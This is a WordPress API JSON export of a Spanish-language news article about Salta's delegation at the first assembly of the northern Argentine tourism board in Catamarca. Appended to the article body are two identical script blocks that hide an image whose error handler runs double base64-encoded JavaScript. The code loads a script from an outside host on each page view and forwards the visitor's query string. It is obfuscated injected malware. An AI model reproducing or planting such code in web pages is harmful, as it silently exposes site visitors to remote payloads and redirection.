{"id":5082,"date":"2025-04-23T08:42:51","date_gmt":"2025-04-23T11:42:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5082"},"modified":"2025-08-13T23:35:34","modified_gmt":"2025-08-14T02:35:34","slug":"salta-participo-activamente-de-la-primera-asamblea-del-ente-norte-de-turismo-en-catamarca","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5082","title":{"rendered":"Salta particip\u00f3 activamente de la primera asamblea del Ente Norte de Turismo en Catamarca"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><em>Con una destacada participaci\u00f3n de representantes del sector p\u00fablico y privado, la comitiva salte\u00f1a encabezada por la secretaria de Turismo, Nadia Loza, form\u00f3 parte de la primera asamblea del Ente Norte de Turismo. Durante la jornada, Salta present\u00f3 el marco conceptual para la elaboraci\u00f3n del Plan de Marketing del Norte.<\/em><\/h4>\n\n\n\n<p>En San Fernando del Valle de Catamarca, se desarroll\u00f3 la primera asamblea del Ente Norte de Turismo con la participaci\u00f3n de autoridades del sector p\u00fablico y privado de Jujuy, Salta, Tucum\u00e1n, Santiago del Estero, La Rioja y Catamarca. La comitiva de Salta fue encabezada por la secretaria de Turismo,&nbsp;<strong>Nadia Loza<\/strong>, quien destac\u00f3 la importancia de estos espacios para avanzar en una agenda com\u00fan de desarrollo tur\u00edstico para toda la regi\u00f3n.<\/p>\n\n\n\n<p>\u201cDesde Salta entendemos que el Norte tiene una enorme oportunidad de posicionarse como un destino con identidad propia. En esta oportunidad, compartimos un marco te\u00f3rico sobre qu\u00e9 implica construir un plan de marketing tur\u00edstico regional, sus componentes, metodolog\u00edas y visi\u00f3n estrat\u00e9gica, con el objetivo de iniciar un proceso participativo junto a los equipos t\u00e9cnicos y el sector privado\u201d, explic\u00f3 Nadia Loza.<\/p>\n\n\n\n<p>Durante la jornada, se validaron los lineamientos metodol\u00f3gicos para la construcci\u00f3n del futuro Plan de Marketing del Norte, una herramienta que se dise\u00f1ar\u00e1 para los pr\u00f3ximos cinco a\u00f1os con una mirada integral. Su prop\u00f3sito ser\u00e1 posicionar a la regi\u00f3n tanto a nivel nacional como internacional, destacando su riqueza natural, cultural y humana.<\/p>\n\n\n\n<p>\u201cAspiramos a tener un plan estrat\u00e9gico que ordene nuestras acciones de promoci\u00f3n y posicionamiento, que nos sirva como hoja de ruta para los pr\u00f3ximos cinco a\u00f1os. Y en paralelo, vamos a avanzar con un plan operativo de promoci\u00f3n que contemple acciones inmediatas y coordinadas entre las provincias\u201d, a\u00f1adi\u00f3 la Secretaria de Turismo.<\/p>\n\n\n\n<p>Cabe destacar que la comitiva salte\u00f1a estuvo tambi\u00e9n integrada por el subsecretario de Competitividad y Desarrollo Tur\u00edstico,&nbsp;<strong>Juan Lucero<\/strong>; el director de Promoci\u00f3n,<strong>&nbsp;Ra\u00fal Siares<\/strong>; el director de Articulaci\u00f3n con Municipios,&nbsp;<strong>Alejandro Romero<\/strong>, y la directora de Calidad y Capacitaci\u00f3n,&nbsp;<strong>Alicia Checa<\/strong>.<\/p>\n\n\n\n<p>Por el sector privado, acompa\u00f1aron el presidente de la C\u00e1mara de Turismo de Salta,&nbsp;<strong>Facundo Assaf<\/strong>; el presidente de la C\u00e1mara Hotelera, Gastron\u00f3mica y Afines de Salta,&nbsp;<strong>Juan Chib\u00e1n<\/strong>, y la presidenta de la Asociaci\u00f3n de Hoteles de Turismo filial Salta,&nbsp;<strong>Mariana Farjat<\/strong>.<\/p>\n\n\n\n<p>La asamblea cont\u00f3 con la presencia ministra de Cultura, Turismo y Deportes de Catamarca, y presidenta del Ente Norte de Turismo, Daiana Rold\u00e1n, el presidente del Ente Tucum\u00e1n Turismo, Domingo Amaya; el subsecretario de Turismo de Santiago del Estero, Nelson Bravo; el secretario de Turismo de Jujuy, Diego Valdecantos; el secretario de Turismo de La Rioja, Jos\u00e9 Rosa; y autoridades de Catamarca, provincia anfitriona, entre ellas el gobernador Ra\u00fal Jalil.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una destacada participaci\u00f3n de representantes del sector p\u00fablico y privado, la comitiva salte\u00f1a encabezada por la secretaria de Turismo, Nadia Loza, form\u00f3 parte de la primera asamblea del Ente Norte de Turismo. Durante la jornada, Salta present\u00f3 el marco conceptual para la elaboraci\u00f3n del Plan de Marketing del Norte. En San Fernando del Valle [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5083,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[8,16],"tags":[],"class_list":{"0":"post-5082","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-eventos","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5082"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5082"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5082\/revisions"}],"predecessor-version":[{"id":6513,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5082\/revisions\/6513"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5083"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5082"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5082"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5082"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}